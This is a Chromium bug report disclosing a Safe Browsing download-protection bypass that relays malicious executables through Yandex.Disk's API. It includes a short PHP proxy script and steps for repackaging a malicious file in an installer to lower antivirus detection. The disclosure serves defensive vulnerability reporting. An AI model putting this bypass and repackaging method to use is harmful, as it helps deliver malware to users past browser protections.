Download Protection Bypass
Reported by
gordeev....@gmail.com,
Apr 21 2016
|
|||
Issue descriptionHello. We want to tell about method download malicious file. I. We used a file that can be downloaded from: https://www.google.com/about/appsecurity/chrome-rewards/ 1) Files content.exe и pua.exe uploaded Yandex.Disk (https://disk.yandex.ru/) and we will get links to files: https://yadi.sk/d/cl5avITiqnmtz and https://yadi.sk/d/AoYD9FZOqnnPe. Links, we will use when make a request to https://cloud-api.yandex.net of php script. 2) We created the web-page, where you can see how it works. This page include different links(methods) for download: 2.1 With help Yandex.disk, more details on this method is described below 2.2 Direct link download with our server 2.3 Direct links with https://www.google.com/about/appsecurity/chrome-rewards/ The second and third methods do not allow you to download files. If you use the first method, you can download files. Description method download with help Yandex.Disk: a) When user click to download's link, will be made ajax request to URL: http://test.files-hub.com/request b) http://test.files-hub.com/request - this is php script, which makes a request with help curl to https://cloud-api.yandex.net and adds the parameter. Parameter is a link, as described in paragraph 1. After that, we get the answer with a direct link to the file. C) Url that we got in paragraph b, we send to ajax, who was called with the page http://test.files-hub.com d) Direct link inserted to window.location.href with help javascript, then begins the download File request.php <?php if(isset($_GET['v'])){ if($_GET['v']==1) $link = "https://yadi.sk/d/cl5avITiqnmtz"; //content.exe else if($_GET['v']==2) $link = "https://yadi.sk/d/AoYD9FZOqnnPe"; //pua.exe else if($_GET['v']==3) $link = "https://yadi.sk/d/Ml4JugUgqmwLS"; //safebrowser.exe } if(isset($link)){ $url = "https://cloud-api.yandex.net:443/v1/disk/public/resources/download?public_key=".urlencode($link); $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($handle, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($handle); $code = curl_getinfo($handle, CURLINFO_HTTP_CODE); if($code == 200){ echo $response; } } ?> II. The method downloading other malicious file 1. We found the file goinf_plugin_cis.exe in the internet, and uploaded it to virustotal.com. Link to report: https://virustotal.com/ru/file/9cd6e5b256a4b446826c5b37d8ca7510937131e5ea9706ee96cc67fde1560792/analysis/1459929170/ 2. File goinf_plugin_cis.exe upload to the server, the link http://test.files-hub.com/files/goinf_plugin_cis.exe 3. With help NSIS create installer(SafeBrowser.exe). This installer will be downloaded by users, and run the main exe file, which include malicious code 4. Сheck the SafeBrowser.exe on the virustotal.com, link to report: https://virustotal.com/ru/file/45b5013282aa4f428a36257ee339775ca7e02d7fac87b512ff9c7e0c393ea793/analysis/1459959870/ The program detected by some antivirus systems, but less than that of the main program 5. Upload the file(SafeBrowser.exe) to Yandex.Disk, and we get direct link to the file https://yadi.sk/d/Ml4JugUgqmwLS 6. We add the links to exe to page http://test.files-hub.com also VERSION Chrome Version: 49.0.2623.110 m Operating System: Microsoft Windows 7 Service Pack 1 / Microsoft Windows 10 version 1511
,
Apr 21 2016
Issue 601125 has been merged into this issue.
,
Mar 10 2017
For all Download Protection VRP bugs: removing label Restrict-View-Google and adding Restrict-View-SecurityTeam instead.
,
Mar 11 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||
►
Sign in to add a comment |
|||
Comment 1 by vakh@chromium.org
, Apr 21 2016